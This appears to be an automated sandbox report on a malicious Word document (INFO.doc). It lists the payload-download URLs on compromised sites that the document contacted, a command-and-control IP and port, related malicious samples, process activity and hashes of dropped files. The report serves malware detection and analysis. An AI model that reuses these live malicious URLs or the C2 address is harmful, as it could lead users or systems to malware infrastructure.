                      silkonbusiness.matrixinfotechsolution.com5%VirustotalBrowse
                      armakonarms.com7%VirustotalBrowse
                      bimception.com2%VirustotalBrowse
                      coworkingplus.es2%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://www.bimception.com0%Avira URL Cloudsafe
                      https://bbjugueteria.com/s6kscx/Z/100%Avira URL Cloudmalware
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      https://bbjugueteria.comh0%Avira URL Cloudsafe
                      http://coworkingplus.es/wp-admin/FxmME/100%Avira URL Cloudmalware
                      http://coworkingplus.es100%Avira URL Cloudmalware
                      http://armakonarms.com/wp-includes/fz/100%Avira URL Cloudmalware
                      https://www.bimception.com/wp-admin/sHy5t/100%Avira URL Cloudmalware
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://silkonbusiness.matrixinfotechsolution.com/js/q26/100%Avira URL Cloudmalware
                      http://armakonarms.com100%Avira URL Cloudmalware
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      https://www.bimception.comh0%Avira URL Cloudsafe
                      http://silkonbusiness.matrixinfotechsolu0%Avira URL Cloudsafe
                      http://silkonbusiness.matrixinfotechsolution.com100%Avira URL Cloudmalware
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://homecass.com/wp-content/iF/P100%Avira URL Cloudmalware
                      https://bbjugueteria.com0%Avira URL Cloudsafe
                      http://homecass.com/wp-content/iF/100%Avira URL Cloudmalware
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      http://195.159.28.230:8080/u4vcbkerccn0qjbn6d/1p4m0oqpu4fiqr/mxqkk/0%Avira URL Cloudsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://alugrama.com.mx/t/2/100%Avira URL Cloudmalware

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      silkonbusiness.matrixinfotechsolution.com
                      166.62.10.32
                      truetrueunknown
                      armakonarms.com
                      45.143.97.183
                      truetrueunknown
                      bimception.com
                      162.241.224.176
                      truetrueunknown
                      coworkingplus.es
                      172.67.138.213
                      truetrueunknown
                      bbjugueteria.com
                      162.241.60.240
                      truetrue
                        unknown
                        www.bimception.com
                        unknown
                        unknowntrue
                          unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://coworkingplus.es/wp-admin/FxmME/true
                          • Avira URL Cloud: malware
                          unknown
                          http://armakonarms.com/wp-includes/fz/true
                          • Avira URL Cloud: malware
                          unknown
                          http://silkonbusiness.matrixinfotechsolution.com/js/q26/true
                          • Avira URL Cloud: malware
                          unknown
                          http://195.159.28.230:8080/u4vcbkerccn0qjbn6d/1p4m0oqpu4fiqr/mxqkk/true
                          • Avira URL Cloud: safe
                          unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.windows.com/pctv.rundll32.exe, 00000009.00000002.2123455227.0000000001E70000.00000002.00000001.sdmpfalse
                            high
                            http://investor.msn.comrundll32.exe, 00000006.00000002.2102802733.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101866606.0000000001E70000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113778647.0000000001E70000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2123455227.0000000001E70000.00000002.00000001.sdmpfalse
                              high
                              http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000006.00000002.2102802733.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101866606.0000000001E70000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113778647.0000000001E70000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2123455227.0000000001E70000.00000002.00000001.sdmpfalse
                                high
                                https://www.bimception.compowershell.exe, 00000005.00000002.2098378692.0000000003D0B000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: safe
                                unknown
                                https://bbjugueteria.com/s6kscx/Z/powershell.exe, 00000005.00000002.2098250708.0000000003B75000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://ocsp.sectigo.com0powershell.exe, 00000005.00000002.2098389832.0000000003D2A000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://bbjugueteria.comhpowershell.exe, 00000005.00000002.2098373151.0000000003D06000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://coworkingplus.espowershell.exe, 00000005.00000002.2098250708.0000000003B75000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://www.bimception.com/wp-admin/sHy5t/powershell.exe, 00000005.00000002.2098250708.0000000003B75000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000006.00000002.2103047321.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101997100.0000000002057000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113913061.0000000002057000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2123608466.0000000002057000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2336757432.0000000002207000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.hotmail.com/oerundll32.exe, 00000006.00000002.2102802733.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101866606.0000000001E70000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113778647.0000000001E70000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2123455227.0000000001E70000.00000002.00000001.sdmpfalse
                                  high
                                  https://www.cloudflare.com/5xx-error-landingpowershell.exe, 00000005.00000002.2098332140.0000000003C7E000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2098338840.0000000003C9A000.00000004.00000001.sdmpfalse
                                    high
                                    http://armakonarms.compowershell.exe, 00000005.00000002.2098389832.0000000003D2A000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000006.00000002.2103047321.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101997100.0000000002057000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113913061.0000000002057000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2123608466.0000000002057000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2336757432.0000000002207000.00000002.00000001.sdmpfalse
                                      high
                                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tpowershell.exe, 00000005.00000002.2098389832.0000000003D2A000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.icra.org/vocabulary/.rundll32.exe, 00000006.00000002.2103047321.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101997100.0000000002057000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113913061.0000000002057000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2123608466.0000000002057000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2336757432.0000000002207000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2093216776.00000000023B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2114289434.00000000027D0000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.2090680205.00000000001C4000.00000004.00000020.sdmpfalse
                                          high
                                          https://www.bimception.comhpowershell.exe, 00000005.00000002.2098389832.0000000003D2A000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://silkonbusiness.matrixinfotechsolupowershell.exe, 00000005.00000002.2098338840.0000000003C9A000.00000004.00000001.sdmptrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://silkonbusiness.matrixinfotechsolution.compowershell.exe, 00000005.00000002.2098338840.0000000003C9A000.00000004.00000001.sdmptrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#powershell.exe, 00000005.00000002.2098389832.0000000003D2A000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://homecass.com/wp-content/iF/Ppowershell.exe, 00000005.00000002.2094020711.0000000002DF4000.00000004.00000001.sdmptrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://bbjugueteria.compowershell.exe, 00000005.00000002.2098338840.0000000003C9A000.00000004.00000001.sdmptrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://homecass.com/wp-content/iF/powershell.exe, 00000005.00000002.2098250708.0000000003B75000.00000004.00000001.sdmptrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://investor.msn.com/rundll32.exe, 00000006.00000002.2102802733.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101866606.0000000001E70000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113778647.0000000001E70000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2123455227.0000000001E70000.00000002.00000001.sdmpfalse
                                            high
                                            https://sectigo.com/CPS0Dpowershell.exe, 00000005.00000002.2098389832.0000000003D2A000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.piriform.com/ccleanerpowershell.exe, 00000005.00000002.2090680205.00000000001C4000.00000004.00000020.sdmpfalse
                                              high
                                              http://www.%s.comPApowershell.exe, 00000005.00000002.2093216776.00000000023B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2114289434.00000000027D0000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              low
                                              http://alugrama.com.mx/t/2/powershell.exe, 00000005.00000002.2098250708.0000000003B75000.00000004.00000001.sdmptrue
                                              • Avira URL Cloud: malware
                                              unknown

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              162.241.60.240
                                              unknownUnited States
                                              46606UNIFIEDLAYER-AS-1UStrue
                                              195.159.28.230
                                              unknownNorway
                                              2116ASN-CATCHCOMNOtrue
                                              162.241.224.176
                                              unknownUnited States
                                              46606UNIFIEDLAYER-AS-1UStrue
                                              45.143.97.183
                                              unknownTurkey
                                              25145TEKNOTEL-ASTeknotelTelekomunikasyonASTRtrue
                                              69.38.130.14
                                              unknownUnited States
                                              26878TWRS-NYCUStrue
                                              172.67.138.213
                                              unknownUnited States
                                              13335CLOUDFLARENETUStrue
                                              166.62.10.32
                                              unknownUnited States
                                              26496AS-26496-GO-DADDY-COM-LLCUStrue

                                              General Information

                                              Joe Sandbox Version:31.0.0 Red Diamond
                                              Analysis ID:343450
                                              Start date:23.01.2021
                                              Start time:13:38:23
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 7m 6s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:INFO.doc
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                              Number of analysed new started processes analysed:12
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • GSI enabled (VBA)
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winDOC@16/8@5/7
                                              EGA Information:
                                              • Successful, ratio: 80%
                                              HDC Information:
                                              • Successful, ratio: 31.6% (good quality ratio 29.4%)
                                              • Quality average: 70.8%
                                              • Quality standard deviation: 26.8%
                                              HCA Information:
                                              • Successful, ratio: 72%
                                              • Number of executed functions: 15
                                              • Number of non-executed functions: 1
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .doc
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Found warning dialog
                                              • Click Ok
                                              • Attach to Office via COM
                                              • Scroll down
                                              • Close Viewer
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                              • Execution Graph export aborted for target powershell.exe, PID 2500 because it is empty
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              13:38:36API Interceptor1x Sleep call for process: msg.exe modified
                                              13:38:37API Interceptor50x Sleep call for process: powershell.exe modified
                                              13:38:52API Interceptor657x Sleep call for process: rundll32.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              195.159.28.230DKMNT.docGet hashmaliciousBrowse
                                              • 195.159.28.230:8080/u14g/zkd6myomm2wuro5/q121fslblp4j4u7p7ny/boxgaf0or/u8p9yrywc1amf/
                                              WWB4766-012021-4480624.docGet hashmaliciousBrowse
                                              • 195.159.28.230:8080/orsnig0hr2s74h42s/s6f5l/8oomdsfuyoft/ut3wi8ze1lmdcgp5d/zu7j1c9ns/otptuv61n2r997toe/
                                              file.docGet hashmaliciousBrowse
                                              • 195.159.28.230:8080/3j8r06xre/8aflom7at/nfsdzovs6zi5xy894/pzjbw/
                                              Dokumentation_2021_M_428406.docGet hashmaliciousBrowse
                                              • 195.159.28.230:8080/n0jv/20kkdc3lp37n1r7yr9l/7fl0uh0jxz/
                                              69.38.130.14DOK-012021.docGet hashmaliciousBrowse
                                                DKMNT.docGet hashmaliciousBrowse
                                                  WWB4766-012021-4480624.docGet hashmaliciousBrowse
                                                    file.docGet hashmaliciousBrowse
                                                      Dokumentation_2021_M_428406.docGet hashmaliciousBrowse
                                                        166.62.10.32MES-2021_01_22-3943960.docGet hashmaliciousBrowse
                                                        • zippywaytest.toppermaterial.com/wp-admin/wwbJ/
                                                        Documento 2201 01279.docGet hashmaliciousBrowse
                                                        • zippywaytest.toppermaterial.com/wp-admin/wwbJ/

                                                        Domains

                                                        No context

                                                        ASN

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        UNIFIEDLAYER-AS-1USElectronic form.docGet hashmaliciousBrowse
                                                        • 192.232.250.227
                                                        file.docGet hashmaliciousBrowse
                                                        • 162.241.253.129
                                                        Payment_[Ref 72630 - joe.blow].htmlGet hashmaliciousBrowse
                                                        • 50.87.150.0
                                                        Payment _Arabian Parts Co BSC#U00a9.exeGet hashmaliciousBrowse
                                                        • 74.220.199.6
                                                        request_form_1611306935.xlsmGet hashmaliciousBrowse
                                                        • 162.241.225.18
                                                        file-2021-7_86628.docGet hashmaliciousBrowse
                                                        • 162.241.253.129
                                                        SecuriteInfo.com.Trojan.Dridex.735.31734.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        SecuriteInfo.com.Trojan.Dridex.735.12612.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        SecuriteInfo.com.Trojan.Dridex.735.4639.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        SecuriteInfo.com.Trojan.Dridex.735.24961.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        SecuriteInfo.com.Trojan.Dridex.735.6647.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        SecuriteInfo.com.Trojan.Dridex.735.4309.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        SecuriteInfo.com.Trojan.Dridex.735.30163.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        SecuriteInfo.com.Trojan.Dridex.735.17436.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        SecuriteInfo.com.Trojan.Dridex.735.15942.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        SecuriteInfo.com.Trojan.Dridex.735.27526.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        SecuriteInfo.com.Trojan.Dridex.735.71.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        SecuriteInfo.com.Trojan.Dridex.735.23113.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        SecuriteInfo.com.Trojan.Dridex.735.32551.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        SecuriteInfo.com.Trojan.Dridex.735.1019.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        UNIFIEDLAYER-AS-1USElectronic form.docGet hashmaliciousBrowse
                                                        • 192.232.250.227
                                                        file.docGet hashmaliciousBrowse
                                                        • 162.241.253.129
                                                        Payment_[Ref 72630 - joe.blow].htmlGet hashmaliciousBrowse
                                                        • 50.87.150.0
                                                        Payment _Arabian Parts Co BSC#U00a9.exeGet hashmaliciousBrowse
                                                        • 74.220.199.6
                                                        request_form_1611306935.xlsmGet hashmaliciousBrowse
                                                        • 162.241.225.18
                                                        file-2021-7_86628.docGet hashmaliciousBrowse
                                                        • 162.241.253.129
                                                        SecuriteInfo.com.Trojan.Dridex.735.31734.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        SecuriteInfo.com.Trojan.Dridex.735.12612.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        SecuriteInfo.com.Trojan.Dridex.735.4639.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        SecuriteInfo.com.Trojan.Dridex.735.24961.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        SecuriteInfo.com.Trojan.Dridex.735.6647.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        SecuriteInfo.com.Trojan.Dridex.735.4309.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        SecuriteInfo.com.Trojan.Dridex.735.30163.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        SecuriteInfo.com.Trojan.Dridex.735.17436.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        SecuriteInfo.com.Trojan.Dridex.735.15942.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        SecuriteInfo.com.Trojan.Dridex.735.27526.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        SecuriteInfo.com.Trojan.Dridex.735.71.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        SecuriteInfo.com.Trojan.Dridex.735.23113.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        SecuriteInfo.com.Trojan.Dridex.735.32551.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        SecuriteInfo.com.Trojan.Dridex.735.1019.dllGet hashmaliciousBrowse
                                                        • 198.57.200.100
                                                        ASN-CATCHCOMNODKMNT.docGet hashmaliciousBrowse
                                                        • 195.159.28.230
                                                        WWB4766-012021-4480624.docGet hashmaliciousBrowse
                                                        • 195.159.28.230
                                                        file.docGet hashmaliciousBrowse
                                                        • 195.159.28.230
                                                        Dokumentation_2021_M_428406.docGet hashmaliciousBrowse
                                                        • 195.159.28.230
                                                        mssecsvr.exeGet hashmaliciousBrowse
                                                        • 159.163.124.251
                                                        windows.staterepositoryupgrade.exeGet hashmaliciousBrowse
                                                        • 195.159.28.244
                                                        Check.vbsGet hashmaliciousBrowse
                                                        • 64.28.27.61
                                                        HKHX38WttZ.exeGet hashmaliciousBrowse
                                                        • 195.159.28.230
                                                        SecuriteInfo.com.Trojan.GenericKD.35280757.18070.dllGet hashmaliciousBrowse
                                                        • 193.90.12.121
                                                        Information-822908953.docGet hashmaliciousBrowse
                                                        • 193.90.12.121
                                                        ef5ai1p.dllGet hashmaliciousBrowse
                                                        • 193.90.12.121
                                                        Documentation.478396766.docGet hashmaliciousBrowse
                                                        • 193.90.12.121
                                                        Information-478224510.docGet hashmaliciousBrowse
                                                        • 193.90.12.121
                                                        7aKeSIV5Cu.dllGet hashmaliciousBrowse
                                                        • 193.90.12.121
                                                        qRMGCk1u96.dllGet hashmaliciousBrowse
                                                        • 193.90.12.121
                                                        dVcML4Zl0J.dllGet hashmaliciousBrowse
                                                        • 193.90.12.121
                                                        JTWtIx6ADf.dllGet hashmaliciousBrowse
                                                        • 193.90.12.121
                                                        yrV5qWOmi3.dllGet hashmaliciousBrowse
                                                        • 193.90.12.121
                                                        Invoice_99012_476904.xlsmGet hashmaliciousBrowse
                                                        • 193.90.12.121
                                                        Invoice_043866_370540.xlsmGet hashmaliciousBrowse
                                                        • 193.90.12.121

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{731F7BDD-FA20-48C4-87C4-17800DB89026}.tmp
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1024
                                                        Entropy (8bit):0.05390218305374581
                                                        Encrypted:false
                                                        SSDEEP:3:ol3lYdn:4Wn
                                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A405A664-1AD9-4129-9210-CBEF36952470}.tmp
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1536
                                                        Entropy (8bit):1.3568273340340578
                                                        Encrypted:false
                                                        SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbP:IiiiiiiiiifdLloZQc8++lsJe1MzQF
                                                        MD5:29F9976124164A0B4ED9EA26E0CAAB06
                                                        SHA1:651BB7DC6156EAEBDE5A83ED92DD344BF152F2FC
                                                        SHA-256:03FFD6E0D4366835DAAA01BFC4A388545A1C0F63C92B6F256AEC7A7DF18986B3
                                                        SHA-512:2A7C78ED8CAC574BC74447C051724F3D60FE6494A246951BF5FD52BB850DA50292311687E1B7993253395E71992C391D87FCEAB9D50B2A8E2AC70DEF814F227E
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\INFO.LNK
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Wed Aug 26 14:08:12 2020, atime=Sat Jan 23 20:38:33 2021, length=178176, window=hide
                                                        Category:dropped
                                                        Size (bytes):1960
                                                        Entropy (8bit):4.51166296191488
                                                        Encrypted:false
                                                        SSDEEP:24:8t/XTwz6I4U88eCgDv3qswdM7dD2t/XTwz6I4U88eCgDv3qswdM7dV:8t/XT3In7VswQh2t/XT3In7VswQ/
                                                        MD5:9E18C9E7B53663DEE2A04C1970A741EF
                                                        SHA1:45EF48214A8051AB0E3183A7CEAF8919CCE21E32
                                                        SHA-256:AE16182BEE3258BC41BBCF9035D86C036DE1453C982A66C392DB307AA1BCD958
                                                        SHA-512:80D6EA7AC57BB904117AFF0814AE25A19D6D75ECBE76FDDB8C04007EF357309E9E97FEE52EC7B08B7B743CF9B2E0E4394A20D2343290C066EEFE64BB82A9B1D7
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview: L..................F.... ...$l...{..$l...{..@.a..................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....V.2.....7R. .INFO.doc..>.......Q.y.Q.y*...8.....................I.N.F.O...d.o.c.......r...............-...8...[............?J......C:\Users\..#...................\\878411\Users.user\Desktop\INFO.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.N.F.O...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......878411..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[....L..................F
                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):50
                                                        Entropy (8bit):3.908493070364557
                                                        Encrypted:false
                                                        SSDEEP:3:M1KjqLFul0AFulmX1KjqLFulv:McjqLFu1FuLjqLFu1
                                                        MD5:352E8E469D97790BE4608A5F946AF702
                                                        SHA1:1CF781AED5E3E6DF1875CCA068A875F6012DAA02
                                                        SHA-256:7CDD0C1E040D8EF3A29CF52C4795A2EA4808DE86F0C1F3A4A82C78C098C54B58
                                                        SHA-512:B93B8BA6091AAD06BC85F2368D36D483F2B3D21E3F2B59B2DE2F2BE19CFC9AC37A483CE216DE21119A48FC3607F9662D4A358D8C0F72FFEE684CF54571F2017D
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview: [doc]..INFO.LNK=0..INFO.LNK=0..[doc]..INFO.LNK=0..
                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):162
                                                        Entropy (8bit):2.431160061181642
                                                        Encrypted:false
                                                        SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                        MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                        SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                        SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                        SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RIYF4A312FSQFZJVU7KN.temp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8016
                                                        Entropy (8bit):3.585659569413659
                                                        Encrypted:false
                                                        SSDEEP:96:chQCsMqmqvsqvJCwouwz8hQCsMqmqvsEHyqvJCworMwz1PYjHRwf8IulUVAwIu:cy7ouwz8yvHnorMwz10wf8IOwIu
